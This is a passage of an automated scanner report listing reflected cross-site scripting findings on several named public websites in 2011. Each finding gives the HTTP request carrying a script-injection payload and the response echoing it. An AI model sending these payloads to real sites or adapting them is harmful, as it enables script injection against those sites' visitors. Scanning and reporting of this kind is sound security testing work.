User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 31 Mar 2011 20:55:01 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=kf7ukuqvd5bgvhm4od9h9imi24; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.songmeanings.net/favicon.icob33bc"><script>alert(1)</script>a51ed548431&c5=&c6=&c15=&cj=1" />
...[SNIP]...

1.113. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f08b"-alert(1)-"494e1710a8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4f08b"-alert(1)-"494e1710a8a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 31 Mar 2011 20:55:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=00fmhtl6pbcedh779v1l4g83n5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<script type="text/javascript">
// Note: it's important to keep these in separate script blocks
COMSCORE.beacon({
   c1: 2,
   c2: "6772046",
   c3: "",
   c4: "http://www.songmeanings.net/favicon.ico4f08b"-alert(1)-"494e1710a8a", // Replace this with the page URL that the site is on here, and also enter it into the <noscript>
...[SNIP]...

1.114. http://www.spike.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec0c1"><script>alert(1)</script>afc2cefb029 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoec0c1"><script>alert(1)</script>afc2cefb029 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spike.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=1751
Date: Thu, 31 Mar 2011 20:14:04 GMT
Connection: close
Connection: Transfer-Encoding
Vary: User-Agent
Content-Length: 34871


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="
...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/spike.com?url=/favicon.icoec0c1"><script>alert(1)</script>afc2cefb029&pageType=&cmsPageId=&show=&title=&season=&photoTitle=&spikeTvShow=&channel=" type="text/javascript">
...[SNIP]...

1.115. http://www.supercheats.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supercheats.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea494"%3balert(1)//e6be00164d7 was submitted in the REST URL parameter 1. This input was echoed as ea494";alert(1)//e6be00164d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoea494"%3balert(1)//e6be00164d7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.supercheats.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:34:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script>

COMSCORE.beacon({

c1:2,

c2:"6035764",

c3:"",

c4:"http://www.supercheats.com/favicon.icoea494";alert(1)//e6be00164d7",

c5:"",

c6:"",

c15:""

});

</script>
...[SNIP]...

1.116. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8148"><script>alert(1)</script>7ba47235182 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob8148"><script>alert(1)</script>7ba47235182 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:56:07 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 31 Mar 2011 20:56:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=bb3eqmqc0j8lui0a14t7efboe4; expires=Fri, 30 Mar 2012 20:56:07 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=bb3eqmqc0j8lui0a14t7efboe4; expires=Thu, 21-Apr-2011 20:56:07 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTYwNDk2NztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Wed, 29-Jun-2011 20:56:07 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=bb3eqmqc0j8lui0a14t7efboe4%3A0%3A%3A%3A; expires=Wed, 29-Jun-2011 20:56:07 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26108

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icob8148"><script>alert(1
...[SNIP]...
<INPUT TYPE="hidden" NAME="returnUrl" VALUE="/favicon.icob8148"><script>alert(1)</script>7ba47235182">
...[SNIP]...

1.117. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3c351--><script>alert(1)</script>439fc8ca87b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico3c351--><script>alert(1)</script>439fc8ca87b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:56:14 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 31 Mar 2011 20:56:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=g5njc62lhobn4h4o79d6ngik90; expires=Fri, 30 Mar 2012 20:56:14 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=g5njc62lhobn4h4o79d6ngik90; expires=Thu, 21-Apr-2011 20:56:14 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTYwNDk3NDtzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Wed, 29-Jun-2011 20:56:14 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=g5njc62lhobn4h4o79d6ngik90%3A0%3A%3A%3A; expires=Wed, 29-Jun-2011 20:56:14 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.ico3c351--><script>alert(1)</script>439fc8ca87b
copyright 1999-2011, Visionary Networks
10.3.1.18
#################################### -->
...[SNIP]...

1.118. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c58eb'-alert(1)-'f27d99f6952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoc58eb'-alert(1)-'f27d99f6952 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:56:11 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 31 Mar 2011 20:56:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=u8cm8iknetq9sgotjhg0agq5l5; expires=Fri, 30 Mar 2012 20:56:11 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=u8cm8iknetq9sgotjhg0agq5l5; expires=Thu, 21-Apr-2011 20:56:11 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTYwNDk3MTtzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Wed, 29-Jun-2011 20:56:11 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=u8cm8iknetq9sgotjhg0agq5l5%3A0%3A%3A%3A; expires=Wed, 29-Jun-2011 20:56:11 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 25980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icoc58eb'-alert(1)-'f27d9
...[SNIP]...

var random3 = Math.round( Math.random() * 5000230 );

       var URL = ''
           + '&sid=u8cm8iknetq9sgotjhg0agq5l5'
           + '&uid='
           + '&pid=a-self-no'
           + '&site=tarot'
           + '&pg=/favicon.icoc58eb'-alert(1)-'f27d99f6952'
           + '&pq='
           + '&rf='
           + '&ftr='
           + '&rq='
           + '&res=' + screen.width + 'x' + screen.height
           + '&col=' + c
           + '&brws=' + escape(navigator.appName)
           + '&brv=' + escape(navigator.appVersio
...[SNIP]...

1.119. http://www.textbooks.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be7ae'%3b36893a9968e was submitted in the REST URL parameter 1. This input was echoed as be7ae';36893a9968e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icobe7ae'%3b36893a9968e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.textbooks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3627
Content-Type: text/html
Date: Thu, 31 Mar 2011 22:01:42 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
set() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/favicon.icobe7ae';36893a9968e'

</script>
...[SNIP]...

1.120. http://www.thecarconnection.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thecarconnection.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec02b'><a>9afb3f07edb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ec02b'><a>9afb3f07edb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thecarconnection.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.5
Expires:
Cache-Control: max-age=300
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26013
Date: Thu, 31 Mar 2011 21:42:42 GMT
X-Varnish: 1223216541
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<iframe class="hgm__iframe_ad" src='http://ad.doubleclick.net/adi/carconnection.tmus/;pos=top;tile=1;sz=728x90;page=ec02b'><a>9afb3f07edb;dcopt=ist;ord=1301607762.7585;mtfIFPath=/doubleclick/'
width='728' height='90' hspace='0' vspace='0' frameborder='0' bordercolor='#000000'
scrolling='no' marginheight='0' mar
...[SNIP]...

1.121. http://www.thecarconnection.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thecarconnection.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5687a'-alert(1)-'6b867f4e90c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico5687a'-alert(1)-'6b867f4e90c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thecarconnection.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.5
Expires:
Cache-Control: max-age=300
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26195
Date: Thu, 31 Mar 2011 21:42:46 GMT
X-Varnish: 1223216817
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript" src="http://ad.doubleclick.net/adj/carconnection.tmus/;pos=;tile=2;sz=980x50;page=favicon.ico5687a'-alert(1)-'6b867f4e90c;dcopt=ist;ord=' + ord + '?" >
...[SNIP]...

1.122. http://www.thecarconnection.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thecarconnection.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c63b"><a>5bc279c610e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico8c63b"><a>5bc279c610e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thecarconnection.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.5
Expires:
Cache-Control: max-age=300
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26164
Date: Thu, 31 Mar 2011 21:42:36 GMT
X-Varnish: 1223216188
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/carconnection.tmus/;pos=;tile=2;sz=980x50;page=favicon.ico8c63b"><a>5bc279c610e;ord=123456789?" target="_blank">
...[SNIP]...

1.123. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0337"><script>alert(1)</script>606da0c2b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa0337"><script>alert(1)</script>606da0c2b5e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailybeast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Thu, 31 Mar 2011 20:20:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/favicon.icoa0337"><script>alert(1)</script>606da0c2b5e"/>
...[SNIP]...

1.124. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af88"><script>alert(1)</script>7ea5153237d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3af88"><script>alert(1)</script>7ea5153237d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailyshow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Type: text/html;charset=utf-8
Content-Length: 26317
Cache-Control: max-age=1800
Date: Thu, 31 Mar 2011 20:25:45 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title></title>
       <meta name="description" content=
...[SNIP]...
<link rel="canonical" href="http://www.thedailyshow.com/favicon.ico3af88"><script>alert(1)</script>7ea5153237d" />
...[SNIP]...

1.125. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e074c"><script>alert(1)</script>fe4046e2407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoe074c"><script>alert(1)</script>fe4046e2407 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:32:18 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.thehollywoodgossip.com; expires=Thu, 31-Mar-2011 21:32:18 GMT
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=7jab6j7phjoqucevmg395iiu06; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.thehollywoodgossip.com/favicon.icoe074c"><script>alert(1)</script>fe4046e2407/" />
...[SNIP]...

1.126. http://www.thestar.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3bb6'%3be6d45b6e7b3 was submitted in the REST URL parameter 1. This input was echoed as f3bb6';e6d45b6e7b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f3bb6'%3be6d45b6e7b3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thestar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Thu, 31 Mar 2011 22:04:16 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age = 300
Content-Length: 51331
Date: Thu, 31 Mar 2011 21:55:57 GMT
X-Varnish: 2894367460
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-1
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_f3bb6';e6d45b6e7b3_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.127. http://www.thirdage.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 326ac"><script>alert(1)</script>0947f8fff2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico326ac"><script>alert(1)</script>0947f8fff2f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thirdage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
X-Drupal-Cache: MISS
Expires: Sun, 19 Nov 1978 05:00:00 GMT
